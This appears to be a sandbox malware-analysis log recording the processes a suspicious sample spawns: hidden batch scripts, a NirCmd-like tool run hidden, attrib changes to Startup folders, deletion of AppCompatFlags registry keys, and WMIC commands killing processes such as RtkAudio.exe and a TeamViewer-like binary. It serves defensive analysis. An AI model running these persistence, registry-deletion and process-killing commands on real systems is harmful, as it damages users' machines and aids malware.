Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\est1.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\two.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"Local"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i /c:"RtkAudio"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i /c:"RtkAudio"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior

Source: K4gsPJGEi4.exe, cmdow.exe0.15.dr, cmdow.exe.15.dr, cm.avi.15.dr, cmdo.jpg.15.dr	Binary or memory string: Shell_TrayWnd
Source: K4gsPJGEi4.exe, cmdow.exe0.15.dr, cmdow.exe.15.dr, cm.avi.15.dr, cmdo.jpg.15.dr	Binary or memory string: use CMDOW /? <parameter>. Eg CMDOW /? /window or CMDOW /? /act.Shell_TrayWndkernel32.dllSetConsoleDisplayMode
Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: Progman
Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: progman
Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: shell_traywnd
Source: screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: "Userenv.dllCreateEnvironmentBlockCreateProcessWithLogonWExplorer.exeShell_TrayWndProgmanSetConsoleDisplayModeEnumDisplayDevicesAmasterwaveoutsynthcdmicrophonephoneauxlineheadphoneswaveinaltctrlshiftextplusspcentertabescinsdelDllRegisterServerDllUnregisterServerNirCmdWinClsfolder.loopcountcurrdate.currtime.sys.nir.param.fparam.clipboardNirComLinenowexefilesystemwindowsnircmdcommon_desktopcommon_start_menucommon_programsdesktopstart_menuprogramsstartupappdatacookiesfavoritesrecentcommon_startupcommon_favoritesprogramfilescommon_programfilesmydocumentsnormallowbelownormalabovenormalhighrealtimeSeTcbPrivilegeSeDebugPrivilegenohexnoasciibinCannot find the specified process !Failed to load the process library !leftshiftrightshiftleftctrlrightctrlleftmenurightmenudownupleftrighthomeendinsertdeletecommaminusperiodlwinrwinappspageuppagedownmultiplyaddsubtractseperatordividebackspacepausecapslocknumlockscrollprintscreen#32770clicksettextshowshownahidehideshowflashmaxminsettopmostfocusactivateenabledisabletoggledisabletogglehidetogglemintogglemaxredrawsetsizesendmsgpostmsgcenterchildmovedlgclickdlgsettextdlgsetfocus+style-style+exstyle-exstyletranstitlestitleititleetitleidclassprocessalltopalltopnodesktopprogmanshell_traywndbuttonallFailed to create the shortcut !nircmd.exe %sadmin$\nircmd.exe\\cfocusedsystemsoundsSound Devicesdefault_recordshowerrorparamsfilecmdwaitloopremotecopymultiremoteqboxcomqboxcomtopinfoboxqboxqboxtopexec2execexecmdcmd.execommand.com%s /c %sregsetvalThe specified key is not valid !SZEXPAND_SZDWORDBINARYregdelvalregdelkeyCannot delete the key, because it contains one or more subkeys.regeditinisetvalinidelvalinidelsecrasdialdlginetdialThe dialing function is not available in your system !rasdialUnable to receive dialup information of the specified entry !moverecyclebinemptybinrashangupFailed to hung up this RAS itemCannot find the specified connection name !exitwinlogoffpoweroffrebootshutdownforceforceifhungabortshutdowninitshutdowncmdshortcutcmdshortcutkeyshortcutshexecFailed to execute this file !clonefiletimesetfiletimesetfilefoldertimesetconsolemodeconsolewritesetconsolecolordebugwritesetcursorsetcursorwinrestartexplorersendkeypress+sendkeypresssendmousewheeldblclickmovecursorchangebrightness\\.\LCDsetbrightnesssetprimarydisplaysetdisplaymonitor:-updatereg-allusersFailed to change the display setting !Invalid display values !closeprocessFailed to close the specified process !killprocessFailed to kill the specified process !memdumpserviceUnable to load the services library !stopcontinuestartrestartautomanualdisabledbootwinhandleactiveforegroundlockwsclearsetfilereadfilewritefilewriteufileaddfileaddufilecopyimagesaveimageloadclpsaveclpsetdialuplogonFailed to set the logon details for this dialup item !scriptmediaplayopen "%s" type mpegvideo alias %splay %sclose %surlshortcut%fav%Failed to create the internet shortcut !monitoroffonasync_offasync_onasync_lowscreensaverscreensavertimeoutrunassystemwinlogon.exeruninteractiveruninteract

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
